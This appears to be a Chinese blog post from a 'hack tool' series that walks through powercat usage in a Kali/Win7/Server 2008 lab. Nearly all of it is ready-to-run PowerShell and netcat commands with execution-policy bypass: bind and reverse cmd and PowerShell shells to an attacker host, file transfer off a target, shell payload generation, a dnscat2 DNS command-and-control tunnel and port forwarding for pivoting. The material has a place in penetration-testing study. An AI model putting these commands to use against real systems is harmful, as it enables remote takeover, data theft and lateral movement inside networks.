Hacktool系列之powercat

Powercat常用情景

简单网络架构

kali:192.168.0.128

win7:192.168.0.137、10.10.10.131

winserver2008:10.10.10.171

正向连接目标

目标机器win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;Powercat -l -p 8080 -e cmd.exe -v}"

攻击者kali

nc 192.168.0.137 8080 -vv

反向连接目标

攻击者kali

nc -l -p 8080 -vv

目标机器win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -c 192.168.0.128 -p 8080 -v -e cmd.exe}"

反向连接并返回powershell

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -l -p 8080 -v}"

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1;powercat -c 10.10.10.131 -p 8080 -v -ep}"

传输文件

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -l -p 8080 -of C:\Users\al\Desktop\flag.txt -v}"

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1
;powercat -c 10.10.10.131 -p 8080 -i C:\flag.txt -v}"

生成payload

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -l -p 8080 -e cmd -v -g >> shell.ps1}"

winserver 2008

powershell.exe -exec bypass -Command ".\shell.ps1"

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -c 10.10.10.171 -p 8080 -v}"

DNS协议(DNSCAT)

kali

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

kali

ruby dnscat2.rb test.com -e open

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -c 192.168.0.128 -p 53 -dns test.com -e cmd.exe -v}"

kali(-i 后面的数字视自己建立连接的情况更改)

session -i 1

端口转发

winserver 2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1
;powercat -l -v -p 9999 -e cmd.exe}"

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -l -v -p 8000 -r tcp:10.10.10.171:9999}"

kali

nc 192.168.0.137 8000 -vv

端口转发DNS

kali

ruby dnscat2.rb test.com -e open

win7

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\al\Desktop\powercat-master\powercat.ps1
;powercat -l -v -p 8080 -r dns:192.168.0.128::test.com}"

winserver2008

powershell.exe -exec bypass -Command "& {Import-Module C:\powercat-master\powercat.ps1
;powercat -c 10.10.10.131 -p 8080 -e cmd.exe -v}"
posted @ 2022-01-11 14:48  墨宸  阅读(18)  评论(0)    收藏  举报